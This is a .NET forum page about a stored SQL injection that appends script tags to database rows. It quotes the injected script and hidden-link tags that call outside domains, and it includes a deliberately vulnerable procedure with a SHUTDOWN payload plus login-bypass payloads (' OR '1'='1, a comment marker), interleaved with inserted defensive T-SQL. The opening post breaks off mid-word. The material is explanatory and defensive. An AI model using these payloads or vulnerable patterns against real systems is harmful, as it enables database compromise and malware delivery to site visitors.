.NET Tutorials, Forums, Interview Questions And Answers

What is this - XSS attack or SQL Injection

Posted By:      Posted Date: September 29, 2010    Points: 0   Category :ASP.Net

Hi All,

I am struggling with the problem since last week. The application is built upon the following technologies - ASP.NET 1.1, SQL SERVER 2005, extensive use of JavaScript.

I saw last week that an unknown script was appended to one or more columns of every row in certain tables. I removed that script but it re-appeared once again. The script looks something like this (PLEASE DO NOT CLICK ON THIS LINK....I DON'T KNOW WHAT IT WILL DO)</title><script src="http://google-stats50 . info /ur. php>".

When the script reappeared, it may appear with different link (PLEASE DO NOT CLICK ON LINKS BELOW)

1) </title><script src="http:// google-stats49 . info /ur. php>"

2) </title><script src="http:// google-stats48 . info /ur. php>"

3) </title><script src="http:// google-stats47 . info /ur. php>"

4) </title><a style=display:none; href=http:// worid - of - books . com >book</a>

To prevent these scripts from reappearing, I took the following steps:

a) Encrypting the sensitive information in the Web.config file

b) Making the IFRAME element secure by applying the attribute security="restricted"

c) setti

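An added example, not from the original post: a T-SQL script that finds every string column in the current database holding the "</title><script src=" marker quoted above, so the spread of the injection can be measured before any cleaning starts. It assumes SQL Server 2005 or later; the marker text is the one in the post. Two points worth making about the question in the title: text that shows up in every row of a table got there through the database write path, so the injection itself is SQL injection, and what visitors then get when the stored <script> tag is rendered unencoded is a stored XSS effect. Cleaning the rows without finding and parameterising the query that was used to write them only invites re-infection, which is exactly what the post observed.

```sql
-- Added example (not from the original post): count rows per string column that
-- contain the injected marker.  Assumes SQL Server 2005+; run in the affected DB.
SET NOCOUNT ON;

DECLARE @marker nvarchar(100);
SET @marker = N'%</title><script src=%';   -- marker taken from the post

IF OBJECT_ID('tempdb..#hits') IS NOT NULL DROP TABLE #hits;
CREATE TABLE #hits (
    table_name  sysname,
    column_name sysname,
    hit_count   int
);

DECLARE @schema sysname, @table sysname, @column sysname, @sql nvarchar(max);

-- Every char/nchar/varchar/nvarchar/text/ntext column in a base table.
DECLARE col_cursor CURSOR LOCAL FAST_FORWARD FOR
    SELECT c.TABLE_SCHEMA, c.TABLE_NAME, c.COLUMN_NAME
    FROM INFORMATION_SCHEMA.COLUMNS AS c
    JOIN INFORMATION_SCHEMA.TABLES AS t
      ON t.TABLE_SCHEMA = c.TABLE_SCHEMA AND t.TABLE_NAME = c.TABLE_NAME
    WHERE t.TABLE_TYPE = 'BASE TABLE'
      AND c.DATA_TYPE IN ('char', 'nchar', 'varchar', 'nvarchar', 'text', 'ntext');

OPEN col_cursor;
FETCH NEXT FROM col_cursor INTO @schema, @table, @column;
WHILE @@FETCH_STATUS = 0
BEGIN
    -- Identifiers are spliced in through QUOTENAME so the scanner is not itself
    -- a second injection point; the marker travels as a typed parameter.
    -- CAST to nvarchar(max) lets the same LIKE cover text/ntext columns.
    SET @sql = N'INSERT INTO #hits (table_name, column_name, hit_count) '
             + N'SELECT @t, @c, COUNT(*) FROM '
             + QUOTENAME(@schema) + N'.' + QUOTENAME(@table)
             + N' WHERE CAST(' + QUOTENAME(@column) + N' AS nvarchar(max)) LIKE @m';
    EXEC sp_executesql @sql,
         N'@t nvarchar(128), @c nvarchar(128), @m nvarchar(100)',
         @t = @table, @c = @column, @m = @marker;
    FETCH NEXT FROM col_cursor INTO @schema, @table, @column;
END
CLOSE col_cursor;
DEALLOCATE col_cursor;

-- Report only the columns that were actually hit, worst first.
SELECT table_name, column_name, hit_count
FROM #hits
WHERE hit_count > 0
ORDER BY hit_count DESC;
```

Once the page that wrote the rows has been fixed, each reported column can be cleaned with an UPDATE that sets it to REPLACE(CAST(column AS nvarchar(max)), N'<the exact injected string>', N''). The payload's domain changed between infections (google-stats50, 49, 48, 47 and worid-of-books), so match the exact string found in each run rather than hard-coding one domain.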

More Related Resource Links

On SQL Injection Attack Surprises

In a recent thread Erland Sommarskog has pointed out that even nchar(10) text input is big enough for an SQL injection attack. Demo follows:

/************* WARNING ****************
 * THIS IS AN SQL INJECTION DEMO - DON'T RUN IT ON PRODUCTION
 * EXECUTE IT AT YOUR OWN RISK
 ***************************************/
USE tempdb;
GO
/**** DISCLAIMER - DEMO CODE ONLY - DON'T USE IT PRODUCTION ****/
CREATE PROC sprocSQLInjectionAttackDemo
    @input nchar(10)
AS
BEGIN
    DECLARE @SQL nvarchar(max)
    -- The user value is concatenated straight into the statement text (the vulnerability)
    SET @SQL = ' SELECT Color FROM AdventureWorks2008.Production.Product' + CHAR(10) +
               ' WHERE Color like ' + @input
    PRINT @SQL
    EXEC (@SQL)
END
GO

-- Test SQL injection stored procedure
DECLARE @input nchar(10) = '''''SHUTDOWN'
EXEC sprocSQLInjectionAttackDemo @input
GO

/*
 SELECT Color FROM AdventureWorks2008.Production.Product
 WHERE Color like ''SHUTDOWN

(0 row(s) affected)
The SHUTDOWN statement cannot be executed within a transaction or by a stored procedure.
Msg 0, Level 11, State 0, Line 0
A severe error occurred on the current command. The results, if any, should be discarded.
*/

Do you have an SQL Injection surprise story/script? If script, just cripple it to make it harmless.

Kalman Toth, SQL Server & Business Intelligence Training; SQL 2008 GRAND SLAM
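The same procedure with the concatenation removed, added here as an example and not part of Kalman Toth's reply. The test input and the AdventureWorks2008 table are the ones from the demo; the procedure and variable names are assumptions. The point is that a typed parameter can only ever be compared as a value, so a 10-character field that happens to contain SQL does nothing.

```sql
-- Added example (not from the original thread): the nchar(10) demo without dynamic SQL.
USE tempdb;
GO
-- Static SQL: @input reaches the query as a value, never as statement text.
-- RTRIM because nchar(10) is space-padded and LIKE treats trailing spaces as significant.
CREATE PROC sprocSQLInjectionSafeDemo
    @input nchar(10)
AS
BEGIN
    SELECT Color
    FROM AdventureWorks2008.Production.Product
    WHERE Color LIKE RTRIM(@input);
END
GO

-- Same crafted input as the demo above: two apostrophes followed by SHUTDOWN.
-- The pattern ''SHUTDOWN matches no colour: 0 rows, and no second statement exists.
DECLARE @input nchar(10) = '''''SHUTDOWN';
EXEC sprocSQLInjectionSafeDemo @input;
GO

-- If dynamic SQL is unavoidable (say the column is chosen at run time), keep the
-- value out of the string and hand it to sp_executesql as a parameter; only the
-- identifier is spliced in, and QUOTENAME brackets it.
DECLARE @column sysname, @pattern nvarchar(10), @sql nvarchar(max);
SET @column  = N'Color';                      -- assumed run-time choice
SET @pattern = RTRIM(N'''''SHUTDOWN');
SET @sql = N'SELECT ' + QUOTENAME(@column)
         + N' FROM AdventureWorks2008.Production.Product'
         + N' WHERE ' + QUOTENAME(@column) + N' LIKE @p';
EXEC sp_executesql @sql, N'@p nvarchar(10)', @p = @pattern;
GO
```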

workaround for HTML header injection attack in asp.net?


Hi All,

On our site we are running the IBM AppScan tool, and that tool is reporting one problem: HTML header injection. So, how can we fix this problem? Anybody who has faced this problem, let me know.


Burepalli V  S Rao.

SQL Injection Walkthrough / Tutorial

SQL Injection is a trick to inject an SQL query/command as input, possibly via web pages. Many web pages take parameters from the web user and make an SQL query to the database. Take for instance a user login: the web page takes the user name and password and makes an SQL query to the database to check whether the user has a valid name and password. With SQL Injection, it is possible for us to send a crafted user name and/or password field that will change the SQL query and thus grant us something else.
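The login case described above, as an added example that is not part of the tutorial: a throw-away table and two procedures in tempdb, one that concatenates the two fields into the statement and one that does not, each fed with a normal wrong password, a tautology, and a comment marker. The table, procedure, user names and passwords are made up for the demo.

```sql
-- Added example (not from the tutorial): what crafted login fields do to a
-- concatenated query, shown against constructed sample data.  SQL Server 2005+.
USE tempdb;
GO
CREATE TABLE dbo.demo_users (user_name nvarchar(50), pwd nvarchar(50));  -- constructed data
INSERT INTO dbo.demo_users VALUES (N'alice', N'correct horse');
INSERT INTO dbo.demo_users VALUES (N'bob',   N's3cret');
GO

-- Vulnerable: the page's two text fields are glued into the statement text.
CREATE PROC dbo.LoginVulnerable @user nvarchar(100), @pwd nvarchar(100)
AS
BEGIN
    DECLARE @sql nvarchar(max);
    SET @sql = N'SELECT user_name FROM dbo.demo_users WHERE user_name = ''' + @user
             + N''' AND pwd = ''' + @pwd + N'''';
    PRINT @sql;      -- shows how the crafted input rewrote the query
    EXEC (@sql);
END
GO

-- Fixed: the same check as static SQL; the fields are values, not statement text.
CREATE PROC dbo.LoginSafe @user nvarchar(100), @pwd nvarchar(100)
AS
BEGIN
    SELECT user_name FROM dbo.demo_users WHERE user_name = @user AND pwd = @pwd;
END
GO

-- 1) Honest but wrong password: 0 rows from both procedures.
EXEC dbo.LoginVulnerable N'alice', N'wrong';
EXEC dbo.LoginSafe       N'alice', N'wrong';

-- 2) Tautology in both fields.  AND binds tighter than OR, so the vulnerable
--    WHERE ends in ... OR '1'='1' and every user comes back (2 rows); the safe
--    procedure looks for a user literally named ' OR '1'='1 (0 rows).
EXEC dbo.LoginVulnerable N''' OR ''1''=''1', N''' OR ''1''=''1';
EXEC dbo.LoginSafe       N''' OR ''1''=''1', N''' OR ''1''=''1';

-- 3) Comment marker: everything after -- is ignored, so the password test is
--    dropped and alice is returned (1 row) without her password; safe: 0 rows.
EXEC dbo.LoginVulnerable N'alice''--', N'anything';
EXEC dbo.LoginSafe       N'alice''--', N'anything';
GO

DROP PROC dbo.LoginVulnerable;
DROP PROC dbo.LoginSafe;
DROP TABLE dbo.demo_users;
GO
```

The PRINT output is the part worth reading: in case 2 the statement becomes WHERE user_name = '' OR '1'='1' AND pwd = '' OR '1'='1', and in case 3 it becomes WHERE user_name = 'alice'--' AND pwd = 'anything', which is why the password column is never consulted.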

Test Run: Fault Injection Testing with TestApi


Fault injection testing is the process of deliberately inserting an error into an application to determine whether it deals with the error properly. We'll explain how you can introduce faults into .NET applications at run time using the Managed Code Fault Injection APIs of the TestApi library.

James McCaffrey

MSDN Magazine August 2010

Inside Microsoft patterns & practices: Dependency Injection in Libraries


This article discusses how to write a library or framework that uses the Dependency Injection pattern and how the change in focus affects the usage of the pattern.

Chris Tavares

MSDN Magazine November 2009

PIAB And WCF: Integrating the Policy Injection Application Block with WCF Services


Using the PIAB you can enhance WCF services with policies such as validation, performance monitoring, authorization and caching without having to change a line of code.

Hugh Ang and David San Filippo

MSDN Magazine February 2008

Design Patterns: Dependency Injection


Today there is a greater focus than ever on reusing existing components and wiring together disparate components to form a cohesive architecture. But this wiring can quickly become a daunting task because as application size and complexity increase, so do dependencies.

Griffin Caprio

MSDN Magazine September 2005

Attack Surface: Mitigate Security Risks by Minimizing the Code You Expose to Untrusted Users


In this article, Microsoft security expert Michael Howard discusses the cardinal rules of attack surface reduction. His rules - reduce the amount of code executing by default, reduce the volume of code that is accessible to untrusted users by default, and limit the damage if the code is exploited - are explained along with the techniques to apply the rules to your code.

Michael Howard

MSDN Magazine November 2004

Data Security: Stop SQL Injection Attacks Before They Stop You


To execute a SQL injection attack, a hacker writes a Web page that captures text in a textbox to be used to execute a query against a database. The hacker enters a malformed SQL statement into the textbox that causes the back-end database to perform operations the owners did not intend it to perform, like making unauthorized updates. This article explains how you can protect against the all too common SQL injection attack in your own database. The steps covered include data validation, proper exception handling, and much more.

Paul Litwin

MSDN Magazine September 2004

sql Injection



In a text field, whatever I enter after the less-than "<" symbol disappears.

So I am just replacing this symbol with a space; please let me know if there is any other desired output we need here.




UserControl, CustomControl Design Time Support errors IOC, Dependency Injection, MVP

Hi, is there a way to completely disable design-time support for CustomControl and UserControl? I have about 30 UserControls and 10 CustomControls in my WinForms app, which contain some Dependency Injection and IoC stuff in constructors and Load handlers. I have lots of large UserControls containing smaller UserControls (CompositeView). All my UI code is pretty dynamic, and the only thing I need to do at design time is to drag & drop containers into other containers (UserControls).

And now I have a hard time doing this, because I have to wrap all constructors and Load handlers in CurrentProcess != "devenv"... and when I'm implementing some new View interface (which consists of lots of properties) in a UserControl, all those properties by default throw NotImplementedException, and I don't always need to implement them immediately, but I still need to be able to run this code for testing. Besides, then I have to clean up the designer-generated class because it adds unnecessary null value property initializations, and then it may add some other ____ code, and so on....

Imagine a UserControl with 10-15 nested UserControls, and then I try to open it in the Form Designer and get an ObjectReference NULL exception (for IoC) or some NotSupported/NotImplemented exceptions (for properties) without an adequate CallStack available! There is a CallStack, but there is no trace in it to my code (

Injection attacks

How do we protect our site from SQL Injection attacks, among other security practices?

How to use injection for workflows

I want to inject some instances and values into a workflow using Unity. It seems that the only way to do this is to define InArgument properties on the workflow and assign values to those arguments on the workflow instance prior to running the workflow. For example: <Activity mc:Ignorable="sap" x:Class="WorkflowConsoleApplication1.Workflow1" xmlns="http://schemas.microsoft.com/netfx/2009/xaml/activities" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:mv="clr-namespace:Microsoft.VisualBasic;assembly=System" xmlns:mva="clr-namespace:Microsoft.VisualBasic.Activities;assembly=System.Activities" xmlns:s="clr-namespace:System;assembly=mscorlib" xmlns:s1="clr-namespace:System;assembly=System" xmlns:s2="clr-namespace:System;assembly=System.Xml" xmlns:s3="clr-namespace:System;assembly=System.Core" xmlns:s4="clr-namespace:System;assembly=System.ServiceModel" xmlns:sa="clr-namespace:System.Activities;assembly=System.Activities" xmlns:sad="clr-namespace:System.Activities.Debugger;assembly=System.Activities" xmlns:sap="http://schemas.microsoft.com/netfx/2009/xaml/activities/presentation" xmlns:scg="clr-namespace:System.Collections.Generic;assembly=System" xmlns:scg1="clr-namespace:System.Collections.Gene

create a sql server 2005 new login for SQL Injection prevention

Hi All,

Thank you in advance. Our database was affected by SQL injection, so we need to create a new SQL Server 2005 login for SQL injection prevention. The user should be able to:

- access tables with select, update and delete queries
- access views, functions and stored procedures
- perform cursor operations

What permissions should be given to that login account?
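Added example, not from the original question: a login that gets the permissions listed and nothing more. The login, role and database names and the password are placeholders; the syntax is the SQL Server 2005 form (sp_addrolemember rather than ALTER ROLE, which arrived later).

```sql
-- Added example (not from the original question): least-privilege login for the web app.
USE YourAppDb;   -- placeholder: the application's database
GO
-- Server-level principal.  CHECK_POLICY applies the Windows password policy.
CREATE LOGIN app_web WITH PASSWORD = N'<long random password>', CHECK_POLICY = ON;

-- Database principal mapped to the login.  Deliberately NOT added to db_owner,
-- db_datawriter or any other fixed role.
CREATE USER app_web FOR LOGIN app_web;

-- Hold the grants on a role so they are easy to audit and to reuse for a second account.
CREATE ROLE app_web_role;
EXEC sp_addrolemember 'app_web_role', 'app_web';

-- Tables and views in the dbo schema: exactly the three verbs the question lists.
-- INSERT is absent because it was not on the list; add it only if the app needs it.
GRANT SELECT, UPDATE, DELETE ON SCHEMA::dbo TO app_web_role;

-- Stored procedures and scalar functions.  Table-valued functions are read with
-- SELECT, which is already granted above.
GRANT EXECUTE ON SCHEMA::dbo TO app_web_role;

-- Cursors need no separate permission; they run under the SELECT grant.
-- Nothing here is server-level: the account is not in sysadmin, so xp_cmdshell,
-- sp_configure and other server-wide procedures are out of its reach.
GO
```

Keep in mind what this does and does not buy. It limits what an injected statement can do, but it does not stop the injection: the symptom in the first post, a script tag appended to every row, is an UPDATE, and UPDATE is on the required list. Least privilege is containment; the fix is parameterised queries in the application code.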

ASP.NET MVC 3 P1 Filter Injection

Hello! I've read through Brad Wilson's article series "ASP.NET MVC 3 Service Location" (http://bradwilson.typepad.com/blog/2010/07/service-location-pt4-filters.html) and tried to get filter injection to work with Unity, without success (Stack Trace: http://www.aspkoll.se/code/Index.asp?id=625). Feels like I have searched for all relevant keywords I can think of but have not found any other article that takes up the subject, so the question is: how do I solve it with the filter injection? Can also add that the code is exactly the same as Brad Wilson's and I use the newest version of Unity.

Thanks,
Timmie

Custom Authenticate Attribute with Constructor (Dependency) Injection

I have a [BeastAuthenticate] attribute on my controller. The following code works fine, but I would like to use constructor (dependency) injection with Unity. The problem is that the attribute will run the constructor with no parameters. Interfaces ITMSLogger and IADGroups are set up to use dependency injection with TMSLogger and ADGroups respectively. The following code works fine but doesn't use dependency injection for class ADGroups.

public class BeastAuthenticateAttribute : AuthorizeAttribute
{
    private ITMSLogger logger = new TMSLogger();

    public BeastAuthenticateAttribute()
    {
        ADGroups adGroups = new ADGroups(logger);
        Roles = adGroups.GetRolesWithGroup("BEAST");
    }
}

I tried the following but I'm getting an error ("Object reference is required...") with "this (adGroups)".

public class BeastAuthenticateAttribute : AuthorizeAttribute
{
    private ITMSLogger logger = new TMSLogger();
    private IADGroups adGroups; // = new ADGroups(new TMSLogger());

    public BeastAuthenticateAttribute() : this (adGroups)
    {
        // adGroups = new ADGroups(logger);
        // this(adGroups);
    }

    public BeastAuthenticateAttribute(IADGroups adGroups)
    {
        //ADGroups adGroups = new ADGroups(l

Prevent SQL Injection when using values from a ListBox in the query

Hello, I'm using a List Box to get multiple values that will be used in a query. I can loop over the List Box and create the string, i.e. 'blue','red','purple'. The string is used in the query: SELECT * FROM TABLE1 WHERE COLOR IN('blue','red','purple'). Is there a way to parametrize multiple values? @COLOR='blue','red','purple' What will be the best practice to prevent SQL injection in this scenario?
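Added example, not from the original question: the ListBox selection passed to the query as data rather than as query text, in two forms. The table dbo.Table1 and the Color column come from the question's query; the type, procedure and parameter names are assumptions, and the three values are the ones the question shows.

```sql
-- Added example (not from the original question): a variable-length IN list
-- without building the IN (...) text from user input.

-- Option 1: table-valued parameter (SQL Server 2008 or later).
-- The application fills the table type row by row through one SqlParameter of
-- SqlDbType.Structured; no quoting or escaping of the values ever happens.
CREATE TYPE dbo.ColorList AS TABLE (Color nvarchar(50) NOT NULL);
GO
CREATE PROC dbo.GetByColors @colors dbo.ColorList READONLY
AS
BEGIN
    SELECT t.*
    FROM dbo.Table1 AS t
    WHERE t.Color IN (SELECT c.Color FROM @colors AS c);   -- same semantics as the literal IN
END
GO
-- T-SQL side test, standing in for the values the ListBox would send.
DECLARE @picked dbo.ColorList;
INSERT INTO @picked (Color) VALUES (N'blue');
INSERT INTO @picked (Color) VALUES (N'red');
INSERT INTO @picked (Color) VALUES (N'purple');
EXEC dbo.GetByColors @picked;
GO

-- Option 2: SQL Server 2005 has no table types; ship the list as one XML
-- parameter and shred it.  A quote inside a value is just XML text.
CREATE PROC dbo.GetByColorsXml @colors xml
AS
BEGIN
    SELECT t.*
    FROM dbo.Table1 AS t
    WHERE t.Color IN (SELECT c.value('.', 'nvarchar(50)')
                      FROM @colors.nodes('/colors/c') AS x(c));
END
GO
EXEC dbo.GetByColorsXml N'<colors><c>blue</c><c>red</c><c>purple</c></colors>';
GO
```

From ADO.NET the table-valued parameter is a single SqlParameter with SqlDbType.Structured whose value is a DataTable with one Color column. On 2005 the XML form works, as does the plainer alternative of generating one parameter per selected value in a loop (@p0, @p1, ...) and concatenating only the parameter names, never the values, into the IN list.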